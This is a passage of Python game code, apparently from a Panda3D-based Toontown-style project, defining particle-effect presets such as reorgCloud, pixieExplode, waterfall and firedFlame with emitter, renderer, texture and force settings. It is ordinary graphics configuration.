force3 = LinearJitterForce(8.5449, 0)
force3.setActive(1)
f0.addForce(force3)
self.addForceGroup(f0)
@particle
def fillWithLeadSpray(self):
self.reset()
self.setPos(0.000, 2.000, 2.300)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(150)
p0.setBirthRate(0.0400)
p0.setLitterSize(45)
p0.setLitterSpread(1)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(2.9000)
p0.factory.setLifespanSpread(0.4000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.2000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/roll-o-dex")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.010)
p0.renderer.setFinalXScale(0.010)
p0.renderer.setInitialYScale(0.010)
p0.renderer.setFinalYScale(0.010)
p0.renderer.setNonanimatedTheta(5.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(5.0000)
p0.emitter.setAmplitudeSpread(1.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 5.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -7.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.01000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearVectorForce(Vec3(0.0000, 0.0000, 5.0000), 1.0000, 0)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearSinkForce(Point3(0.0000, 0.0000, -8.0000), LinearDistanceForce.FTONEOVERRSQUARED, 14.5479, 155.9407, 1)
force1.setActive(1)
f0.addForce(force1)
force2 = LinearNoiseForce(1.7000, 0)
force2.setActive(1)
f0.addForce(force2)
force3 = LinearJitterForce(12.5698, 0)
force3.setActive(1)
f0.addForce(force3)
self.addForceGroup(f0)
@particle
def reorgCloud(self):
self.reset()
self.setPos(0.000, 0.000, 3.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(2.000, 2.000, 2.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
#p0.setRenderer("PointParticleRenderer")
p0.setEmitter("SphereSurfaceEmitter")
p0.setPoolSize(70)
p0.setBirthRate(0.0200)
p0.setLitterSize(10)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.5000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/snow-particle")
p0.renderer.setColor(Vec4(1.00, 0.00, 0.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.003)
p0.renderer.setFinalXScale(0.000)
p0.renderer.setInitialYScale(0.003)
p0.renderer.setFinalYScale(0.000)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(-1.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Surface parameters
p0.emitter.setRadius(1.0000)
self.addParticles(p0)
@particle
def demotionFreeze(self):
self.reset()
self.setPos(0.000, 0.000, 3.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(2.000, 2.000, 2.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
#p0.setRenderer("PointParticleRenderer")
p0.setEmitter("SphereSurfaceEmitter")
p0.setPoolSize(70)
p0.setBirthRate(0.0200)
p0.setLitterSize(10)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.5000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/roll-o-dex")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.04)
p0.renderer.setFinalXScale(0.000)
p0.renderer.setInitialYScale(0.04)
p0.renderer.setFinalYScale(0.000)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(-1.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Surface parameters
p0.emitter.setRadius(1.0000)
self.addParticles(p0)
@particle
def demotionSpray(self):
self.reset()
self.setPos(0.000, 4.000, 3.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
#p0.setRenderer("PointParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(150)
p0.setBirthRate(0.0500)
p0.setLitterSize(7)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.8000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/roll-o-dex")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.04)
p0.renderer.setFinalXScale(0.009)
p0.renderer.setInitialYScale(0.04)
p0.renderer.setFinalYScale(0.009)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(3.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 6.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.8900)
self.addParticles(p0)
@particle
def powertrip2(self):
self.reset()
self.setPos(-2.000, 2.500, 2.200)
self.setHpr(-90.000, 0.000, 0.000)
self.setScale(4.800, 4.800, 4.800)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SparkleParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(100)
p0.setBirthRate(0.0800)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.2500)
p0.factory.setLifespanSpread(0.050)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sparkle parameters
p0.renderer.setCenterColor(Vec4(0.1, 0.95, 0.2, 1.00))
p0.renderer.setEdgeColor(Vec4(0, 0, 0, 1.00))
p0.renderer.setBirthRadius(0.1000)
p0.renderer.setDeathRadius(15.0000)
p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(2.4000)
p0.emitter.setAmplitudeSpread(1.1000)
p0.emitter.setOffsetForce(Vec3(0.0000, 1.1000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.120)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(-10.0000, 0.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 2.5308, 1)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearVectorForce(Vec3(0.0000, 0.0000, 0.0000), 1.0000, 0)
force1.setActive(1)
f0.addForce(force1)
force2 = LinearJitterForce(4.5449, 0)
force2.setActive(1)
f0.addForce(force2)
self.addForceGroup(f0)
@particle
def rollodexVortex(self):
self.reset()
self.setPos(-0.003, 2.465, 3.714)
self.setHpr(84.924, 13.378, 56.334) #(70.004, -75.422, 35.756)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("TangentRingEmitter")
p0.setPoolSize(250)
p0.setBirthRate(0.1000)
p0.setLitterSize(5)
p0.setLitterSpread(3)
p0.setSystemLifespan(5.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.5000)
p0.factory.setLifespanSpread(0.2500)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(40.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/rollodex-card")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.4)
p0.renderer.setFinalXScale(0.4)
p0.renderer.setInitialYScale(0.3)
p0.renderer.setFinalYScale(0.3)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(3.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Tangent Ring parameters
p0.emitter.setRadius(0.7500)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forward')
# Force parameters
force0 = LinearSourceForce(Point3(0.0000, 0.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.0000, 1)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearSinkForce(Point3(0.0000, 0.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 5.0000, 6.0000, 0)
force1.setActive(0)
f0.addForce(force1)
force2 = LinearCylinderVortexForce(1.0000, 1.0000, 15.0000, 1.0000, 0)
force2.setActive(1)
f0.addForce(force2)
force3 = LinearSourceForce(Point3(0.5000, 0.0000, 1.0000), LinearDistanceForce.FTONEOVERRCUBED, 4.0000, 4.0000, 1)
force3.setActive(1)
f0.addForce(force3)
self.addForceGroup(f0)
@particle
def pixieExplode(self):
self.reset()
self.setPos(2.500, 0.000, 2.500)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(3.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SparkleParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(100)
p0.setBirthRate(0.1000)
p0.setLitterSize(7)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.5000)
p0.factory.setLifespanSpread(0.2000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
p0.renderer.setUserAlpha(1.00)
# Sparkle parameters
p0.renderer.setCenterColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setEdgeColor(Vec4(0.00, 0.00, 1.00, 1.00))
p0.renderer.setBirthRadius(0.0400)
p0.renderer.setDeathRadius(0.0000)
p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETEXPLICIT)
p0.emitter.setAmplitude(1.0000)
p0.emitter.setAmplitudeSpread(0.0100)
p0.emitter.setOffsetForce(Vec3(-0.1000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.5000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.1000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearJitterForce(2.0000, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def guiltTrip(self):
self.reset()
self.setPos(-2.000, 2.500, 2.200)
self.setHpr(-90.000, 0.000, 0.000)
self.setScale(4.800, 4.800, 4.800)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SparkleParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(100)
p0.setBirthRate(0.0800)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.4000)
p0.factory.setLifespanSpread(0.000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sparkle parameters
p0.renderer.setCenterColor(Vec4(1.0, 0, 0, 0.9))
p0.renderer.setEdgeColor(Vec4(0.8, 0.8, 0.8, 0.4))
p0.renderer.setBirthRadius(0.1000)
p0.renderer.setDeathRadius(15.0000)
p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(2.4000)
p0.emitter.setAmplitudeSpread(1.1000)
p0.emitter.setOffsetForce(Vec3(0.0000, 1.1000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.120)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearJitterForce(14.5449, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def soundBreak(self):
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("ZSpinParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("PointEmitter")
p0.setPoolSize(7)
p0.setBirthRate(0.0500)
p0.setLitterSize(3)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.5000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Z Spin factory parameters
p0.factory.setInitialAngle(0.0000)
p0.factory.setInitialAngleSpread(180.0000)
p0.factory.enableAngularVelocity(1)
p0.factory.setAngularVelocity(0.0000)
p0.factory.setAngularVelocitySpread(0.0000)
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAINOUT)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setTextureFromNode("phase_5/models/props/uberSoundEffects", "**/break")
#p0.renderer.addTextureFromFile('maps/break.tif')
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(1)
p0.renderer.setInitialXScale(1.5000)
p0.renderer.setFinalXScale(1.5000)
p0.renderer.setInitialYScale(0.0000)
p0.renderer.setFinalYScale(9.0000)
p0.renderer.setNonanimatedTheta(319.3987)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(1.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Point parameters
p0.emitter.setLocation(Point3(0.0000, 0.0000, 0.0000))
self.addParticles(p0)
@particle
def pixiePoof(self):
self.reset()
self.setPos(0.000, 0.000, 3.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SparkleParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(200)
p0.setBirthRate(0.0200)
p0.setLitterSize(2)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.0000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p0.renderer.setUserAlpha(1.00)
# Sparkle parameters
p0.renderer.setCenterColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setEdgeColor(Vec4(0.04, 0.04, 1.00, 1.00))
p0.renderer.setBirthRadius(0.0272)
p0.renderer.setDeathRadius(0.1872)
p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(1.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.200)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
@particle
def waterfall(self):
self.reset()
self.setPos(0.000, 5.000, 2.300)
self.setHpr(0.000, -45.000, 0.000)
self.setScale(4.000, 4.000, 4.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SparkleParticleRenderer")
p0.setEmitter("DiscEmitter")
p0.setPoolSize(50)
p0.setBirthRate(0.0500)
p0.setLitterSize(4)
p0.setLitterSpread(1)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.1000)
p0.factory.setLifespanSpread(0.1000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p0.renderer.setUserAlpha(1.00)
# Sparkle parameters
p0.renderer.setCenterColor(Vec4(0.1, 0.95, 0.2, 1.00))
p0.renderer.setEdgeColor(Vec4(0.00, 0.00, 0.00, 1.00))
p0.renderer.setBirthRadius(0.0200)
p0.renderer.setDeathRadius(0.0600)
p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(3.5000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -3.0000, 0.0000))
# Disc parameters
p0.emitter.setRadius(0.2000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -30.0000), LinearDistanceForce.FTONEOVERRSQUARED, 3.0400, 1.5000, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def headShrinkCloud(self):
self.reset()
self.setPos(0.000, 0.000, 8.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SparkleParticleRenderer")
p0.setEmitter("SphereSurfaceEmitter")
p0.setPoolSize(60)
p0.setBirthRate(0.100)
p0.setLitterSize(5)
p0.setLitterSpread(3)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.3000)
p0.factory.setLifespanSpread(0.100)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sparkle parameters
p0.renderer.setCenterColor(Vec4(1, 0.84, 0, 1.00))
p0.renderer.setEdgeColor(Vec4(1, 1, 1, 0.3))
p0.renderer.setBirthRadius(0.1500)
p0.renderer.setDeathRadius(0.0000)
p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(4.0000)
p0.emitter.setAmplitudeSpread(2.5000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Surface parameters
p0.emitter.setRadius(0.0200)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearJitterForce(33.2697, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def firedFlame(self):
self.reset()
self.setPos(0.000, 0.000, 0.500)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(2.500, 4.500, 2.500)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(60)
p0.setBirthRate(0.0220)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.500)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/fire")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.15)
p0.renderer.setFinalXScale(0.00025)
p0.renderer.setInitialYScale(0.30)
p0.renderer.setFinalYScale(0.00025)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(1.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 4.800))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -30.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.4000)
self.addParticles(p0)
@particle
def spinSpray(self):
self.reset()
self.setPos(0.000, 6.500, 3.200)
self.setHpr(50.000, -0.000, -90.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(70)
p0.setBirthRate(0.2000)
p0.setLitterSize(9)
p0.setLitterSpread(4)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.2000)
p0.factory.setLifespanSpread(0.2000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
